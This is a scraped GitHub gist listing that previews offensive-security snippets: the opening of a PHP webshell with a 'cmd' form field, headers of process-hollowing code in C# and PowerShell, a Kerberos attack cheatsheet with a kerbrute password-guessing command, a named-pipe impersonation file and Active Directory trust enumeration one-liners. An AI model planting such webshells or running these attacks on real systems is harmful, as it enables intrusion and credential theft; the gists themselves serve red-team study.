UserX UserXGnu
joswr1ght
/ easy-simple-php-webshell.php
Last active
July 5, 2024 14:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <smgorelik@gmail.com> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |
xenoscr
/ Start-Hollow.ps1
Created
June 13, 2018 12:02
Process Hollowing with PowerShell - by FuzzySec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-Hollow { | |
| <# | |
| .SYNOPSIS | |
| This is a proof-of-concept for process hollowing. There is nothing new here except | |
| maybe the use of NtCreateProcessEx which has some advantages in that it offers a | |
| convenient way to set a parent process and avoids the bothersome Get/SetThreadContext. | |
| On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's. | |
| I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible | |
| to load the Hollow from an internal byte array straight into memory but I have not |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
xpn
/ dotnet_etw.c
Created
March 16, 2020 19:25
A demo of how to collect information on basic .NET events from ETW.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define AssemblyDCStart_V1 155 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> | |
| #include <wmistr.h> | |
| #include <evntrace.h> | |
| #include <Evntcons.h> |
S3cur3Th1sSh1t
/ NamedPipeImpersonation.cs
Created
March 30, 2020 12:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Pipes; | |
| using System.Threading; | |
| using System.Diagnostics; | |
| using System.Security.Principal; | |
| using System.Security.AccessControl; | |
| using System.Runtime.InteropServices; | |
| using System.ComponentModel; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
UserXGnu
/ Hollowing.cs
Created
March 17, 2021 12:32
— forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <smgorelik@gmail.com> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |